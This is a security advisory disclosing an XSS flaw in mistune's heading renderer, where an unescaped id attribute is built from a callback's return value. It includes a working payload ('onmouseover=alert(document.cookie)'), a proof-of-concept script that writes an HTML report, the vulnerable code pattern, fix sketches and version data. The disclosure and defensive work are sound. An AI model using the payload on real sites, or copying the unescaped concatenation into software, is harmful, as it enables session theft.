GHSA-V87V-83H2-53W7
Vulnerability from github – Published: 2026-05-09 00:13 – Updated: 2026-05-09 00:13
Summary
HTMLRenderer.heading() builds the opening <hN> tag by string-concatenating the id attribute value directly into the HTML — with no call to escape(), safe_entity(), or any other sanitisation function. A double-quote character " in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element.
The default TOC hook assigns safe auto-incremented IDs (toc_1, toc_2, …) that never contain user text. However, the add_toc_hook() API accepts a caller-supplied heading_id callback. Deriving heading IDs from the heading text itself, to produce human-readable slug anchors like #installation or #getting-started, is a common real-world use of this callback (documentation generators routinely build anchors this way). When the callback returns raw heading text, an attacker who controls heading content can break out of the id= attribute.
Details
File: src/mistune/renderers/html.py
def heading(self, text: str, level: int, **attrs: Any) -> str:
    tag = "h" + str(level)
    html = "<" + tag
    _id = attrs.get("id")
    if _id:
        html += ' id="' + _id + '"'  # ← _id is never escaped
    return html + ">" + text + "</" + tag + ">\n"
The text body (the heading's inline content) is escaped upstream by the inline token renderer, which is why a double quote in text arrives as &quot;. But _id arrives as a raw string directly from whatever the heading_id callback returned; no escaping occurs at any point in the pipeline.
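To make the missing step concrete, here is a minimal sketch of the same method with the id value escaped before concatenation. It is written as a standalone function (the name heading_escaped is hypothetical) and uses the standard library's html.escape rather than mistune's own helpers, so it should not be read as the actual upstream patch.

```python
import html
from typing import Any


def heading_escaped(text: str, level: int, **attrs: Any) -> str:
    """Standalone variant of heading() that escapes the id value (illustrative only)."""
    tag = "h" + str(level)
    out = "<" + tag
    _id = attrs.get("id")
    if _id:
        # quote=True also converts " and ', so the value cannot close the attribute
        out += ' id="' + html.escape(str(_id), quote=True) + '"'
    return out + ">" + text + "</" + tag + ">\n"


payload = 'foo" onmouseover="alert(document.cookie)" x="'
print(heading_escaped("body", 2, id=payload))
# → <h2 id="foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;">body</h2>
```

With the quotes converted to entities, the whole payload stays inside a single id attribute value.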
PoC
Step 1 — Establish the baseline (safe default IDs)
The script creates a parser with escape=True and the default add_toc_hook() (no custom heading_id callback). The default hook generates sequential numeric IDs:
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe) # default: heading_id produces toc_1, toc_2, …
bl_src = "## Introduction\n"
bl_out, _ = md_safe.parse(bl_src)
Output — ID is auto-generated, no user text appears in it:
<h2 id="toc_1">Introduction</h2>
Step 2 — Add the realistic trigger: a text-based heading_id callback
Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, mkdocs, sphinx, jekyll all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation:
def raw_id(token, index):
    return token.get("text", "")  # returns raw heading text as the ID
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
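For contrast, a callback that reduces the heading text to a restricted character set never returns a quote. The sketch below assumes the same (token, index) signature as raw_id; the names slugify and slug_id and the "section-" fallback are hypothetical, and the ASCII-only rule is a simplification that discards non-Latin heading text.

```python
import re


def slugify(text: str) -> str:
    """Lower-case the text and collapse every run of other characters into '-'."""
    slug = re.sub(r"[^a-z0-9]+", "-", text.lower())
    return slug.strip("-")


def slug_id(token, index):
    # Same (token, index) signature as raw_id; only [a-z0-9-] can be returned.
    slug = slugify(token.get("text", ""))
    # Fall back to a positional id when nothing usable is left.
    return slug or "section-" + str(index)


print(slug_id({"text": 'foo" onmouseover="alert(document.cookie)" x="'}, 0))
# → foo-onmouseover-alert-document-cookie-x
```

Such a callback would be registered the same way, with add_toc_hook(md, heading_id=slug_id). It sidesteps the breakout only because of its character whitelist; the renderer itself still does not escape the value.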
Step 3 — Craft the exploit payload
Construct a heading whose text contains a double-quote followed by an injected attribute:
## foo" onmouseover="alert(document.cookie)" x="
When raw_id is called, token["text"] is foo" onmouseover="alert(document.cookie)" x=". This is passed verbatim to heading() as the id attribute value.
Step 4 — Observe attribute breakout in the output
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
ex_out, _ = md_vuln.parse(ex_src)
Actual output:
<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>
Note: the heading body text is correctly escaped (&quot;), but the id= attribute is not. A user who moves their mouse over the heading triggers alert(document.cookie). Any JavaScript payload can be substituted.
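One way to check for the breakout without opening a browser is to parse the rendered output and list the attributes that actually end up on the heading element. The following sketch uses only the standard library's html.parser; the class and function names are hypothetical, and the sample strings are the outputs quoted in this advisory.

```python
from html.parser import HTMLParser


class HeadingAttrs(HTMLParser):
    """Collects the attribute names of every h1-h6 start tag."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag in {"h1", "h2", "h3", "h4", "h5", "h6"}:
            self.found.append([name for name, _ in attrs])


def heading_attr_names(markup: str):
    parser = HeadingAttrs()
    parser.feed(markup)
    parser.close()
    return parser.found


exploit_out = (
    '<h2 id="foo" onmouseover="alert(document.cookie)" x="">'
    "foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>\n"
)
print(heading_attr_names(exploit_out))
# → [['id', 'onmouseover', 'x']]
```

A heading rendered from a safe id yields only ['id'], so any extra attribute name is a sign that the id value escaped its quotes.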
Script
A verification script reproduces the issue. It writes an HTML report that shows the attribute breakout rendered in the browser.
#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook
def raw_id(token, index):
    return token.get("text", "")
# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)
bl_file = "baseline_h2.md"
bl_src = "## Introduction\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
bl_out, _ = md_safe.parse(bl_src)
print(f"[{bl_file}]\n{bl_src}")
print("[output — id=toc_1, no user content, safe]")
print(bl_out)
# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
ex_file = "exploit_h2.md"
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
ex_out, _ = md_vuln.parse(ex_src)
print(f"[{ex_file}]\n{ex_src}")
print("[output — heading_id returns raw text, id= not escaped]")
print(ex_out)
# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""
def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
<div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
<div class="panels">
<div class="panel">
<h3>Input — {h.escape(filename)}</h3>
<pre>{h.escape(src)}</pre>
</div>
<div class="panel">
<h3>Output — HTML source</h3>
<pre>{h.escape(out)}</pre>
<div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
<div class="rendered">{out}</div>
</div>
</div>
</div>"""
page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 — Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping.
Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)}
{case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)}
</body></html>"""
out_path = os.path.join(os.getcwd(), "report_h2.html")
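# The page contains non-ASCII characters and declares charset UTF-8, so write it as UTF-8.
with open(out_path, "w", encoding="utf-8") as f:
    f.write(page)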
print(f"\n[report] {out_path}")
Example Usage:
python poc.py
Once the script is run, open report_h2.html in the browser and observe the behaviour.
Impact
| Dimension | Assessment |
|---|---|
| Confidentiality | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction |
| Integrity | DOM manipulation, phishing content injection, forced navigation |
| Availability | An injected script can freeze or crash the page |
Risk context: This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's heading_id callback without independently sanitising the returned value.
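For callers who cannot upgrade immediately, one possible stopgap is to escape the callback's return value before the renderer sees it. The wrapper below is a sketch under that assumption; escaped_heading_id is a hypothetical helper, not part of mistune, and on a version whose renderer already escapes the id it would cause the value to be escaped twice.

```python
import html
from typing import Any, Callable, Dict

HeadingId = Callable[[Dict[str, Any], int], str]


def escaped_heading_id(callback: HeadingId) -> HeadingId:
    """Wrap a heading_id callback so its result is safe inside a quoted attribute."""

    def wrapper(token: Dict[str, Any], index: int) -> str:
        # quote=True converts " and ' in addition to &, < and >
        return html.escape(str(callback(token, index)), quote=True)

    return wrapper


def raw_id(token, index):
    return token.get("text", "")


safe_raw_id = escaped_heading_id(raw_id)
print(safe_raw_id({"text": 'foo" onmouseover="x'}, 0))
# → foo&quot; onmouseover=&quot;x
```

The wrapped callback would be passed as add_toc_hook(md, heading_id=safe_raw_id). Escaping keeps the value inside the attribute but does not make it a tidy anchor, so a slug-style callback may still be preferable.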
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.2.0"
},
"package": {
"ecosystem": "PyPI",
"name": "mistune"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44897"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-09T00:13:12Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"id": "GHSA-v87v-83h2-53w7",
"modified": "2026-05-09T00:13:12Z",
"published": "2026-05-09T00:13:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lepture/mistune/security/advisories/GHSA-v87v-83h2-53w7"
},
{
"type": "PACKAGE",
"url": "https://github.com/lepture/mistune"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Mistune Heading ID Attribute has Injection XSS"
}